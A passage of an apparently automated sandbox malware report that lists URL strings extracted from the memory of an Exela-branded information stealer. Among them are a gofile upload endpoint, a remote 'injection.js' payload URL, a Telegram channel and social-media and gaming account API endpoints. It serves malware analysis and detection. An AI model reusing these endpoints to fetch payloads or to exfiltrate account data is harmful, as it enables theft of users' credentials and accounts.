            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652761806.000001FC7580B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652833038.000001FC7580D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652933030.000001FC7580D000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784AD000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827210327.0000023B784AB000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827349619.0000023B784AB000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827119247.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hynek.me/articles/import-attrs/)
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1955400520.000002DCD1507000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i.hi
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i.hizliresim.com/6t31tw2.jpg
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2000507238.000002DCD1A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://i.hizliresim.com/6t31tw2.jpg0
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2000507238.000002DCD1A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://i.hizliresim.com/6t31tw2.jpgp
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999333870.000002DCD07D8000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i.hizliresim.com/8po0puy.jfif
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999333870.000002DCD07D8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://i.hizliresim.com/8po0puy.jfifP
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i.hizliresim.com/eai9bwi.jpg
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999333870.000002DCD07D8000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i.hizliresim.com/qxnzimj.jpg
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999333870.000002DCD07D8000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i.instagram.com/api/v1/accounts/current_user/?edit=true
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999333870.000002DCD07D8000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1955400520.000002DCD1507000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i.instagram.com/api/v1/users/
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999333870.000002DCD07D8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://i.instagram.com/api/v1/users/0
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1654181174.000001FC7580B000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1828658732.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/v/cryptography.svg
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2000507238.000002DCD1A20000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://instagram.com/
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1975909415.000002DCCF608000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1989967017.000002DCCF60B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1967958889.000002DCCF608000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1983700654.000002DCCF609000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1969997805.000002DCCF608000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mahler:8092/site-updates.py
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1654181174.000001FC7580B000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1828658732.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.python.org/mailman/listinfo/cryptography-dev
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2000507238.000002DCD1A20000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oauth.reddit.com/api/v1/me
            Source: svchost.exe, 0000003B.00000003.1758408950.000001B777B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
            Source: svchost.exe, 0000003B.00000003.1758408950.000001B777AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://open.spotify.com/user/
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1986993183.000002DCCEE10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0205/
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652761806.000001FC7580B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652833038.000001FC7580D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652933030.000001FC7580D000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784AD000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827210327.0000023B784AB000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827349619.0000023B784AB000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827119247.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/attrs/)
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1654181174.000001FC7580B000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1828658732.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/cryptography/
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999333870.000002DCD07D8000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/justforExela/injection/main/injection.js
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/justforExela/injection/main/injection.js0A
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784AD000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/python-attrs/attrs/main/docs/_static/attrs_logo.svg
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1654181174.000001FC7580B000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1828658732.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://readthedocs.org/projects/cryptography/badge/?version=latest
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652761806.000001FC7580B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652833038.000001FC7580D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652933030.000001FC7580D000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784AD000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827210327.0000023B784AB000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827349619.0000023B784AB000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827119247.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/questions/tagged/python-attrs)
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2000507238.000002DCD1A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://store8.gofile.io/uploadFile
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1730855532.000002DCD1FFF000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999238737.000002DCD0640000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999333870.000002DCD07B8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1730855532.000002DCD1FFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999238737.000002DCD0640000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1970639661.000002DCD1F60000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1730855532.000002DCD1F50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999238737.000002DCD0640000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1970639661.000002DCD1F60000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1730855532.000002DCD1F50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1955400520.000002DCD1507000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/Exela
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/ExelaStealer
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999333870.000002DCD07D8000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1955400520.000002DCD1507000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/ExelaStealer----------------------
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999333870.000002DCD07D8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/ExelaStealerP5
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999597567.000002DCD0850000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://thumbnails.roblox.com/v1/users/avatar?userIds=
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-attrs?utm_source=pypi-attrs&utm_medium=pypi
            Source: Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-attrs?utm_source=pypi-attrs&utm_medium=referral&utm_campa
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiktok.com/
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999333870.000002DCD07D8000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2000507238.000002DCD1A20000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2000507238.000002DCD1A20000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2000507238.000002DCD1A20000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/home
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999333870.000002DCD07D8000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2000507238.000002DCD1A20000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/i/api/1.1/account/update_profile.json
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999333870.000002DCD07D8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/i/api/1.1/account/update_profile.jsonP
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1997146489.000002DCCFBE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://webcast.tiktok.com/webcast/wallet_api/diamond_buy/permission/?aid=1988&app_language=de-DE&ap
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1653993804.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1828426527.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1653924783.000001FC75816000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1654069044.000001FC75816000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1653993804.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1828354705.0000023B784B4000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1828510059.0000023B784B4000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1828426527.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/LICENSE-2.0
            Source: Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652761806.000001FC7580B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652833038.000001FC7580D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652933030.000001FC7580D000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784AD000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827210327.0000023B784AB000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827349619.0000023B784AB000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827119247.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/)
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784AD000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/23.2.0/_static/sponsors/FilePreviews.svg
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784AD000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/23.2.0/_static/sponsors/Tidelift.svg
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784AD000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/23.2.0/_static/sponsors/Variomedia.svg
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784AD000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/latest/glossary.html#term-dunder-methods)).
